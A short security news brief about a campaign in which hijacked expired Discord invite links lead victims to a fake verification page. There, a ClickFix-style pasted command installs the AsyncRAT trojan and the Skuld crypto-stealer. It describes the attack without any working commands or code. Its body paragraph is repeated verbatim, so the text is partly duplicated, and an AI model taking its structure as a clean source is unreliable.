Threat actors have been taking over expired or deleted Discord invite links to deploy malicious payloads as part of a new attack campaign, according to The Hacker News.
Hijacked invite links have been used to redirect to malicious servers that lure targets into accomplishing a verification procedure that would allow full server access and redirect to another website with a "Verify" button, a report from Check Point Research showed. Attackers then proceed with using the ClickFix technique, with users who clicked the button being sought to execute a copied "verification string" in the Windows run dialog. Such an action results in the deployment of a PowerShell script executing an initial-stage downloader that distributes the AsyncRAT trojan and the Golang-based Skuld information-stealing malware, which allow remote control and cryptocurrency wallet compromise, respectively. Most impacted by the attacks were the U.S., Vietnam, France, Germany, and Slovakia. "The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain," said researchers.
Hijacked invite links have been used to redirect to malicious servers that lure targets into accomplishing a verification procedure that would allow full server access and redirect to another website with a "Verify" button, a report from Check Point Research showed. Attackers then proceed with using the ClickFix technique, with users who clicked the button being sought to execute a copied "verification string" in the Windows run dialog. Such an action results in the deployment of a PowerShell script executing an initial-stage downloader that distributes the AsyncRAT trojan and the Golang-based Skuld information-stealing malware, which allow remote control and cryptocurrency wallet compromise, respectively. Most impacted by the attacks were the U.S., Vietnam, France, Germany, and Slovakia. "The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain," said researchers.
